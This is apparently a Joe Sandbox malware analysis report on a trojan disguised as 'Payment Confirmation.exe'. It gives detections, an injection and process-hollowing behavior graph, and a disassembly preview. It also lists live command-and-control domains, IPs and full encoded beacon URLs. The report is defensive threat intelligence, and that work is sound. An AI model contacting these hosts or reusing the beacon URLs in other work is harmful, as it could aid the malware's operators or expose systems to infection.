          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Virtualization/Sandbox Evasion2Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobApplication Shimming1DLL Side-Loading1Process Injection612LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502129 Sample: Payment Confirmation.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.6233v.com 2->31 33 pflvcllbpf.hellomyai.com 2->33 35 2 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 9 other signatures 2->49 11 Payment Confirmation.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\nawgsdqut.dll, PE32 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 Payment Confirmation.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.atp-cayenne.com 62.210.5.81, 49842, 80 OnlineSASFR France 18->37 39 www.thesewhitevvalls.com 172.105.103.207, 49810, 80 LINODE-APLinodeLLCUS United States 18->39 41 15 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment Confirmation.exe24%VirustotalBrowse
          Payment Confirmation.exe20%ReversingLabsWin32.Backdoor.Androm
          Payment Confirmation.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll3%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Payment Confirmation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.Payment Confirmation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          4.0.Payment Confirmation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.Payment Confirmation.exe.2320000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.msiexec.exe.49f796c.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          4.2.Payment Confirmation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.1.Payment Confirmation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.thesewhitevvalls.com7%VirustotalBrowse
          chinaopedia.com4%VirustotalBrowse
          playstarexch.com4%VirustotalBrowse
          anadolu.academy1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw==0%Avira URL Cloudsafe
          http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ==0%Avira URL Cloudsafe
          http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==0%Avira URL Cloudsafe
          http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA==0%Avira URL Cloudsafe
          http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ==0%Avira URL Cloudsafe
          http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          www.thesewhitevvalls.com/b2c0/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          propage.beatstars.com
          		52.206.159.80
          		truefalse
            		high
            www.thesewhitevvalls.com
            		172.105.103.207
            		truetrueunknown
            chinaopedia.com
            		45.91.80.182
            		truetrueunknown
            playstarexch.com
            		34.102.136.180
            		truefalseunknown
            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
            		3.223.115.185
            		truefalse
              		high
              anadolu.academy
              		94.73.147.156
              		truetrueunknown
              elliotpioneer.com
              		34.102.136.180
              		truefalse
                		unknown
                pflvcllbpf.hellomyai.com
                		134.122.133.171
                		truetrue
                  		unknown
                  www.unasolucioendesa.com
                  		82.98.134.154
                  		truetrue
                    		unknown
                    www.atp-cayenne.com
                    		62.210.5.81
                    		truetrue
                      		unknown
                      carts-amazon.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        www.anadolu.academy
                        		unknown
                        		unknowntrue
                          		unknown
                          www.playstarexch.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.lumberjackguitarloops.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.altitudebc.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.elliotpioneer.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.6233v.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.carts-amazon.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.chinaopedia.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfztrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfztrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfzfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfztrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.thesewhitevvalls.com/b2c0/true
                                        • Avira URL Cloud: safe
                                        		low

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorPayment Confirmation.exefalse
                                            		high
                                            http://www.litespeedtech.com/error-pagemsiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmpfalse
                                              		high
                                              http://nsis.sf.net/NSIS_ErrorErrorPayment Confirmation.exefalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                52.206.159.80
                                                		propage.beatstars.comUnited States
                                                		14618AMAZON-AESUSfalse
                                                45.91.80.182
                                                		chinaopedia.comUnited Kingdom
                                                		209484ASIANETGBtrue
                                                172.105.103.207
                                                		www.thesewhitevvalls.comUnited States
                                                		63949LINODE-APLinodeLLCUStrue
                                                62.210.5.81
                                                		www.atp-cayenne.comFrance
                                                		12876OnlineSASFRtrue
                                                34.102.136.180
                                                		playstarexch.comUnited States
                                                		15169GOOGLEUSfalse
                                                94.73.147.156
                                                		anadolu.academyTurkey
                                                		34619CIZGITRtrue
                                                82.98.134.154
                                                		www.unasolucioendesa.comSpain
                                                		42612DINAHOSTING-ASEStrue
                                                3.223.115.185
                                                		HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comUnited States
                                                		14618AMAZON-AESUSfalse

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:502129
                                                Start date:13.10.2021
                                                Start time:16:30:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 56s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Payment Confirmation.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:24
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@11/8
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 26.6% (good quality ratio 23.5%)
                                                • Quality average: 74.2%
                                                • Quality standard deviation: 33.2%
                                                HCA Information:
                                                • Successful, ratio: 78%
                                                • Number of executed functions: 80
                                                • Number of non-executed functions: 53
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 95.100.216.89
                                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                52.206.159.802WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?7nlpd=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&5jlp=4halC6h
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?3f=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&BZe=kp3h4dC8BXM0A010
                                                vbc.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?yFN4sV7X=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&y48t=zbm4GzHpaJR
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?2dpPwJP=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&YVeD=TX_h
                                                678901.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?T0DTobah=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==&XXut=DtHTzXpHJvwTW
                                                SOA.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?3ff=y6AT2b&m4C=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJAwG6aDcVM1S
                                                Details for bookings.exeGet hashmaliciousBrowse
                                                • www.superbbsuper.com/t052/?ndndnH=UtWlrPo0yz28&AjR=dnoQ9Fq0Tjgk912J2nPmmxMg6AfDnqRukncs3air9eV/cbfskXhsbeNgpyNtUTPj9Sxb
                                                45.91.80.182jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?3f=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&pRvL1=_T_XyD6
                                                vbc.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?yFN4sV7X=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&9redQX=Kxl0dTlPOf
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?m48dC6Y=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&Zj=DBZlR
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?2dpPwJP=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&uN9=3fPH4rk8fd4xHD

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                propage.beatstars.com2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                vbc.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                678901.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                SOA.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                Details for bookings.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                EME_PO.47563.xlsxGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                www.thesewhitevvalls.compKD3j672HL.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                DEUXRWq2W8.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                09090.xlsxGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                82051082.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                8205108.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                vbc.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • 50.17.5.224

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                ASIANETGBjnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                vbc.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                sprogr.exeGet hashmaliciousBrowse
                                                • 155.235.98.69
                                                dmtkgN4tPg.exeGet hashmaliciousBrowse
                                                • 91.216.190.111
                                                googlechrome_3843.exeGet hashmaliciousBrowse
                                                • 155.235.80.79
                                                SecuriteInfo.com.Trojan.DnsChange.10846.3052.exeGet hashmaliciousBrowse
                                                • 23.236.69.114
                                                AMAZON-AESUSPayment Information MT103.exeGet hashmaliciousBrowse
                                                • 18.215.13.95
                                                qalTySElfjGet hashmaliciousBrowse
                                                • 34.226.20.105
                                                rLGunciziYGet hashmaliciousBrowse
                                                • 54.196.47.175
                                                JuufQURFPh.exeGet hashmaliciousBrowse
                                                • 50.16.216.118
                                                ut5yFyWEDdGet hashmaliciousBrowse
                                                • 44.222.19.141
                                                jew.x86Get hashmaliciousBrowse
                                                • 54.167.221.252
                                                ckYh27IjHJGet hashmaliciousBrowse
                                                • 34.236.224.188
                                                TM2ALMOZ8QGet hashmaliciousBrowse
                                                • 18.205.154.215
                                                cM5cZsOuggGet hashmaliciousBrowse
                                                • 54.138.164.249
                                                jew.x86Get hashmaliciousBrowse
                                                • 35.172.163.150
                                                DHL-Waybill.exeGet hashmaliciousBrowse
                                                • 54.208.212.1
                                                UaBxIF11A6Get hashmaliciousBrowse
                                                • 54.82.231.227
                                                80wVQ9c87mGet hashmaliciousBrowse
                                                • 34.238.201.118
                                                ubr43ro8gnGet hashmaliciousBrowse
                                                • 52.3.190.129
                                                DQak2G9Ly5Get hashmaliciousBrowse
                                                • 44.196.235.84
                                                x86Get hashmaliciousBrowse
                                                • 54.53.174.239
                                                sora.x86Get hashmaliciousBrowse
                                                • 44.192.229.159
                                                xd.armGet hashmaliciousBrowse
                                                • 52.0.161.15
                                                R0987653400008789.exeGet hashmaliciousBrowse
                                                • 50.17.226.156
                                                pKD3j672HL.exeGet hashmaliciousBrowse
                                                • 23.21.157.88

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\jkajud1yvpgnu8q
                                                Process:C:\Users\user\Desktop\Payment Confirmation.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):219451
                                                Entropy (8bit):7.993041781240184
                                                Encrypted:true
                                                SSDEEP:6144:6YaKKKKKKKKKKKKKQytJ7SVtrHTKld2xozO6:vJWLrHAIuzO6
                                                MD5:D1F72710AC133640BEEE60FCF6237F37
                                                SHA1:E5153D750F3C97EA0227BFE83BE3B6E98F4A1B50
                                                SHA-256:B8C3F629761EF0C1FADBE9111356C7F82947BE6CECD42F2C5238E0A6101D0A1A
                                                SHA-512:504151BF950F495BD031ADAE6887A3D09E5DC3C9E993541B92422A76230E38593B6A00705A7E3CD07066A05409A98366CFE98118D7C97102E90E5D58D9594388
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..3.0..9..q(....X..Ad.`..2.......^~........{.g...H1\.Uny...?...:AdD...e..f...{[...qQcC......Q.2MZ_...UT$Ir.......(_.."'..&.1..L$.}..^.6.B...` '.L..*....+.......M.B..cn?..O.m.E.X....2.._kTq.......4.0..7$....?%.0B.... U..3c'.u...G.}<Cu.."_..a.S.}..8....9.|.......Q..z.".;..kF.....^~.......<.{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n........]F.m.X...Wm2.=q.T......,.....k7n..w.?%.0B.....U..3c'y6.....}.Cu.e"_..a.S.}......9.<...m...Q..O...;..k......^~........{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n.....n?..O.m.._X.0m2._!.Tq.....,.....k7$....?%.0B.....U..3c'y6.....}.Cu.e"_..a.S.}......9.<...m...Q..O...;..k......^~........{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n.....n?..O.m.._X.0m2._!.Tq.....,.....k7$....?%.0B.....U..3c
                                                C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll
                                                Process:C:\Users\user\Desktop\Payment Confirmation.exe
                                                File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):107008
                                                Entropy (8bit):6.3935752740603675
                                                Encrypted:false
                                                SSDEEP:1536:XlGfGAPqPOicsu0WpmS89PdDeSGTzIfTw83qVlIHyaaEil3Wkly9ncobUfs+ulZ6:1GfGAIOqXSKS13nKixlyrquv
                                                MD5:D4233FEFC9328CC30B0EF014BEB2F51B
                                                SHA1:302180A5EDB1FD653D7884BB60172E6EDFBBEAC4
                                                SHA-256:1827A3002964434B0ACFF1359241948E334148D3413312CFEA326CAE8F269758
                                                SHA-512:B3E19C83E631B6A8B8B0D00AB14AF811519765B737F1497F27E8C3A8C3328038967DBB6095671E4095AF48D6355B5F13CEC20C38EF2DFB14CC2AE8E9482DE4AF
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 3%
                                                Reputation:low
                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....{fa...........!....."...|.......*..............................................................................<...J...........................................................................h]..H...............|............................text...A .......".................. ..`.rdata...R...@...T...&..............@..@.data....C.......&...z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.4809595381543454
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Payment Confirmation.exe
                                                File size:455901
                                                MD5:98ffc3c812e6cec919ebd286973e2002
                                                SHA1:b0d1a65445a7923870ad23ec4d80f592e808c987
                                                SHA256:014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
                                                SHA512:5875f8f2c736cbf501c25635f5c9014e499a7fce01f139315cbf5c0d3c45e1e8568a9fa8ddfe60cb0a44804a7677fdcd411eab4be6177926649b1b691d97a721
                                                SSDEEP:6144:hBlL/NDevWMKIPT48zhmgL58KCjuLkTMm6GBX3KTDDC3cz/3aKkm3HC:n6B8KC4kTrV3KlziKkR
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                File Icon

                                                Icon Hash:d2e2ececd2e4b8c0

                                                Static PE Info

                                                General

                                                Entrypoint:0x4030fb
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FE7208FACF3h
                                                push ebx
                                                call 00007FE7208FDAD4h
                                                cmp eax, ebx
                                                je 00007FE7208FACE9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FE7208FDA50h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FE7208FACCDh
                                                push 0000000Dh
                                                call 00007FE7208FDAA8h
                                                push 0000000Bh
                                                call 00007FE7208FDAA1h
                                                mov dword ptr [00423F44h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
